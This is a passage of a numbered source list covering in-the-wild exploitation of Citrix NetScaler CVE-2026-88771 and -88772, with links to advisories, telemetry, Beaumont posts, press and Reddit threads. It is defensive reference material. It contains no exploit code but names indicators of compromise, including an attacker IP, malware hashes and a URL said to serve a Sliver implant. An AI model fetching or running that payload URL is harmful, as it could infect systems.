| 48 | eSentire TRU - Update: ongoing exploitation of NetScaler CVE-2026-88771 / -88772 (first-hand IR, Sep 29) | Technical research | https://www.esentire.com/security-advisories/update-ongoing-exploitation-of-citrix-netscaler-adc-and-netscaler-gateway-vulnerabilities-cve-2026-88771-cve-2026-88772 |
| 49 | Beazley Security Labs - BSL-A1216 advisory (updates 3-4, Sep 29): consolidated IoCs and hunting commands | Technical research | https://labs.beazley.security/advisories/BSL-A1216 |
| 50 | watchTowr (@watchtowrcyber) - "the watchTowr Labs team has now successfully reproduced this vulnerability" (Oct 3 X post; the vulnerability is not named in the text, understood to be the new SAML issue) | Technical research | https://x.com/watchtowrcyber/status/2106177591438958751 |
| 51 | watchTowr (@watchtowrcyber) on X, Sep 26 - "Unpatched, 0days. Exploited in-the-wild - discovered during forensics." | Technical research | https://x.com/watchtowrcyber/status/2103972792043479307 |
| 52 | CyberMaxx - Patches required: Citrix NetScaler vulns exploited in the wild (IoC notes) | Technical research | https://www.cybermaxx.com/resources/patches-required-citrix-netscaler-vulns-exploited-in-the-wild-cve-2026-88771-and-cve-2026-88772/ |
| 53 | GreyNoise - Swarming Against Citrix 0-Day Exploitation (TLP:CLEAR IoCs, Sep 28) | Telemetry and IoCs | https://www.greynoise.io/blog/swarming-against-citrix-0-day-exploitation |
| 54 | GreyNoise Chronicle - GNTL-20260928 CVE-2026-88771 timeline | Telemetry and IoCs | https://www.greynoise.io/chronicle/gntl-20260928-citrix-cve-2026-88771 |
| 55 | GreyNoise Visualizer - IP 149.104.78.141 | Telemetry and IoCs | https://viz.greynoise.io/ip/149.104.78.141 |
| 56 | GreyNoise tag - Citrix NetScaler CVE-2026-88771 Login Command Injection RCE Attempt | Telemetry and IoCs | https://viz.greynoise.io/tag/citrix-netscaler-cve-2026-88771-login-command-injection-rce-attempt |
| 57 | IFIN - Multiple Citrix Netscaler 0-Days Exploited (tracking thread, from Sep 26; observables "shared without restriction") | Telemetry and IoCs | https://ifin.network/t/multiple-citrix-netscaler-0-days-exploited/867 |
| 58 | VirusTotal - Perl file b9b0a438... (first submitted Oct 2 17:29 UTC; 3 of 75 engines by late 2 Oct); a Nextron THOR rule for CVE-2026-88771 and a community comment tie it to NetScaler exploitation | Telemetry and IoCs | https://www.virustotal.com/gui/file/b9b0a4380db462c706597bd3e6a08d4d99fcbbf0919d63eb99b488d396c8ce63 |
| 59 | VirusTotal - ELF Sliver implant 0188b0eb... (31 of 75 engines; first submitted 2 Oct 11:49 UTC); served from f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host, TLP:CLEAR malware analysis report | Telemetry and IoCs | https://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027 |
| 60 | Censys advisory - NetScaler exposure (42,735 hosts, Sep 28) | Telemetry and IoCs | https://censys.com/advisory/cve-2026-10747-2/ |
| 61 | Defused (@DefusedCyber) on X, Sep 29 - decoy hits across multiple CVE-2026-88771 paths | Telemetry and IoCs | https://x.com/DefusedCyber/status/2104888497693708505 |
| 62 | Lupovis (@LupovisDefence) on X, Sep 28 - decoys catch CVE-2026-88771 exploitation hours after the PoC | Telemetry and IoCs | https://x.com/lupovisdefence/status/2104595071362326680 |
| 63 | Beaumont, Sep 27 - chained CVEs, webshells all September, "Probably nation state aligned" | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117343729453093307 |
| 64 | Beaumont, Sep 27 - patches live; detection script behind NDA; patching does not remove backdoors | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117343821114841048 |
| 65 | Beaumont, Sep 27 - Console check misses attempts when logs have rotated | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117345540231975640 |
| 66 | Beaumont, Sep 28 22:49 UTC - names "PitScaler", >100 victim orgs (his claim) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117351107654208046 |
| 67 | Beaumont, Sep 28 23:02 UTC - Citrix checker incomplete (suid /bin/sh) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117351155381900219 |
| 68 | Beaumont, Sep 29 04:39 UTC - mass exploitation, <10% patched (his claim) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117352481501981552 |
| 69 | Beaumont, Sep 29 06:18 UTC - public message to the NSA (his unverified claim) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117352869498139711 |
| 70 | Beaumont, Sep 29 16:12 UTC - IR vendors publishing victim-unique webshell names | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117355208096613386 |
| 71 | Beaumont, Sep 28 15:13 UTC - GitHub "PoCs" for the new Citrix vulns are "fake AI slop" | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117349313638958333 |
| 72 | Beaumont, Sep 29 18:32 UTC - Dutch government shuts down all Citrix NetScalers (relaying @bert_hubert) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117355758746619146 |
| 73 | Beaumont, Oct 1 00:12 UTC - Arctic Wolf IoCs cover follow-up "spray and pray" activity, not the early-September actor | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117362758120876296 |
| 74 | Beaumont, Oct 2 19:01 UTC - patched 13.1 and 14.1 honeypots are crashing; "we may have #PitScaler 2 on our hands" (with two screenshots of an unattributed write-up) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117372857146978531 |
| 75 | Beaumont, Oct 2 20:00 UTC - Citrix has published a blog on the new SAML issue (edited 20:15 UTC: "pitboss will execute" softened to "something will execute") | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117373090409884785 |
| 76 | Beaumont, Oct 2 19:02 UTC - "to be confirmed but it looks like the pitboss fix is bypassable" | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117372864244958549 |
| 77 | Beaumont, Oct 2 19:19 UTC - one patched honeypot is running a downloaded binary; "sprayed and prayed" | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117372929427365765 |
| 78 | Beaumont, Oct 2 23:25 UTC - "the policy citrix gave out doesn't work for me" (reply to O_P about a responder policy from Citrix Support) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117373896333693635 |
| 79 | Beaumont, Oct 3 01:40 UTC - "The Citrix support mitigations don't appear to work" (with a screenshot of an r/Citrix thread) | Kevin Beaumont | https://cyberplace.social/@GossiTheDog/117374427108683985 |
| 80 | Cybersecurity News - "Citrix NetScaler Keeps Rebooting Following the 0-Day Patch" (Guru Baran, Oct 3; page shows only the date; secondary, Reddit-based) | Press and vendor coverage | https://cybersecuritynews.com/citrix-netscaler-0-day-patch/ |
| 81 | BleepingComputer (Sep 29) - Hackers exploit Citrix NetScaler zero-day to deploy web shells | Press and vendor coverage | https://www.bleepingcomputer.com/news/security/hackers-exploit-citrix-netscaler-zero-day-to-deploy-web-shells/ |
| 82 | BleepingComputer (Sep 27) - Citrix admins warned to shut down NetScalers | Press and vendor coverage | https://www.bleepingcomputer.com/news/security/citrix-admins-warned-to-shut-down-netscalers-over-2-exploited-zero-days/ |
| 83 | The Stack (Oct 1) - Banks, gov'ts, telcos hit by hackers amid escalating NetScaler incident | Press and vendor coverage | https://www.thestack.technology/banks-govts-telcos-hit-by-hackers-amid-escalating-netscaler-incident-2/ |
| 84 | Help Net Security (Sep 30) - Suspected state-sponsored hackers exploited NetScaler zero-day since early September (CVE-2026-88772) | Press and vendor coverage | https://www.helpnetsecurity.com/2026/09/30/cve-2026-88772-netscaler-exploitation-zero-day/ |
| 85 | Cloudflare changelog (Oct 1) - WAF Release 2026-10-01, Emergency: Citrix NetScaler CVE-2026-88771 managed rule | Press and vendor coverage | https://developers.cloudflare.com/changelog/post/2026-10-01-emergency-waf-release/ |
| 86 | Qualys ThreatPROTECT (Sep 28) - Citrix NetScaler zero-day vulnerabilities exploited in attacks | Press and vendor coverage | https://threatprotect.qualys.com/2026/09/28/citrix-netscaler-adc-and-gateway-zero-day-vulnerabilities-exploited-in-attacks-cve-2026-88771-cve-2026-88772/ |
| 87 | The Hacker News (Oct 1) - Citrix NetScaler post-exploitation payload creates superuser, maps web shell to CSS-like URLs (note: THN has also published unrelated third-party-appliance breach coverage sometimes mislinked to NetScaler) | Press and vendor coverage | https://thehackernews.com/2026/10/citrix-netscaler-post-exploitation.html |
| 88 | BleepingComputer (Sep 28) - CISA orders feds to patch exploited Citrix flaws by Wednesday | Press and vendor coverage | https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-exploited-citrix-flaws-by-wednesday/ |
| 89 | SecurityWeek (Sep 28) - Citrix confirms 2 NetScaler zero-days | Press and vendor coverage | https://www.securityweek.com/citrix-confirms-2-netscaler-zero-days-after-admins-pulled-the-plug/ |
| 90 | The Record (Sep 28) - US, UK warn of Citrix NetScaler zero-day bug | Press and vendor coverage | https://therecord.media/us-uk-warn-of-citrix-netscaler-zero-day-bug |
| 91 | CyberScoop (Sep 28) - delayed-disclosure angle | Press and vendor coverage | https://cyberscoop.com/citrix-zero-days-delayed-disclosure/ |
| 92 | Sophos CTU (Sep 28) - CVE-2026-88771 / -88772 in active exploitation | Press and vendor coverage | https://www.sophos.com/en-us/blog/citrix-netscaler-cve-2026-88771-cve-2026-88772-in-active-exploitation |
| 93 | Rapid7 ETR (Sep 28, last updated Sep 30) | Press and vendor coverage | https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-citrix-netscaler-adc-and-gateway-cve-2026-88771-and-cve-2026-88772/ |
| 94 | watchTowr FAQ (Sep 27-28) | Press and vendor coverage | https://watchtowr.com/intelligence/citrix-netscaler-zero-day-vulnerabilities-faq/ |
| 95 | The Register (Sep 29) - Custom malware used in Citrix 0-day attacks targeting govt, banks, professional services | Press and vendor coverage | https://www.theregister.com/security/2026/09/29/custom-malware-used-in-citrix-0-day-attacks-targeting-govt-banks-professional-services/5299867 |
| 96 | Unit 42 (Palo Alto Networks) - NetScaler zero-days threat brief (Sep 27, updated Sep 28 and Sep 30 with pre- and post-disclosure activity and IoCs) | Press and vendor coverage | https://unit42.paloaltonetworks.com/netscaler-zero-days-exploited/ |
| 97 | Cybersecurity Dive (Sep 28) - Shadowserver: more than 20,000 instances exposed | Press and vendor coverage | https://www.cybersecuritydive.com/news/citrix-upgrades-netscaler-exploitation/831502/ |
| 98 | Help Net Security (Sep 29) - NetScaler zero-day exploitation escalates into mass attacks (Lupovis, Censys) | Press and vendor coverage | https://www.helpnetsecurity.com/2026/09/29/netscaler-zero-day-exploitation-escalates-into-mass-attacks-cve-2026-88771/ |
| 99 | Ingeniøren (Sep 30) - Alvorlige huller i kendt software: PET, Forsvaret og Politiet hastelukker systemer | Press and vendor coverage | https://ing.dk/artikel/alvorlige-huller-i-kendt-software-pet-forsvaret-og-politiet-hastelukker-systemer |
| 100 | SDxCentral (Sep 29) - NetScaler bugs bring critical sectors down in Europe (citing Techzine) | Press and vendor coverage | https://www.sdxcentral.com/news/netscaler-bugs-bring-critical-sectors-down-in-europe/ |
| 101 | Cybersecurity Dive (Sep 29) - Citrix NetScaler exploitation began days before public notification | Press and vendor coverage | https://www.cybersecuritydive.com/news/citrix-netscaler-exploitation-days-before-notification/831634/ |
| 102 | heise online (Sep 27) - New zero-day exploits in Citrix NetScaler | Press and vendor coverage | https://www.heise.de/en/news/Security-researchers-warn-New-zero-day-exploits-in-Citrix-Netscaler-11467269.html |
| 103 | heise online (Oct 3 10:23 CEST) - "Netscaler-Admins aufgepasst: Zero-Day verursacht Crashes und Codeausfuehrung" (Dr. Christopher Kunz; cites Beaumont and a watchTowr reproduction claim, confirmed by watchTowr's own post the same day) | Press and vendor coverage | https://www.heise.de/news/Netscaler-Admins-aufgepasst-Zero-Day-verursacht-Crashes-und-Codeausfuehrung-11474971.html |
| 104 | Dark Reading (Sep 29) - Dual NetScaler Zero-Days Trigger Chaos for Citrix Customers | Press and vendor coverage | https://www.darkreading.com/vulnerabilities-threats/netscaler-zero-days-chaos-citrix |
| 105 | Omroep Brabant (Sep 27) - Storing bij ziekenhuizen door kritieke kwetsbaarheden in systeem (Amphia, ETZ, Z-CERT) | Press and vendor coverage | https://www.omroepbrabant.nl/nieuws/6028828/storing-bij-ziekenhuizen-door-kritieke-kwetsbaarheden-in-systeem |
| 106 | r/Citrix - "vulnerability scans causing netscaler reboots" thread (early Oct; anonymous comments, unverified) | Community | https://www.reddit.com/r/Citrix/comments/1wvwuno/vulnerability_scans_causing_netscaler_reboots/ |
| 107 | Maurice_Sec on X - notes from the field on NetScaler Console IoC scanner findings | Community | https://x.com/Maurice_Sec/status/2104541998858240487 |
| 108 | r/Citrix - "Netscaler leak?" thread (~Sep 26) | Community | https://www.reddit.com/r/Citrix/comments/1wqjk9a/netscaler_leak/ |
| 109 | r/Citrix - comment by asmOne (about 29 Sep; date approximate) quoting log-poison attempts | Community | https://www.reddit.com/r/Citrix/comments/1wqjk9a/comment/pcub9wh/ |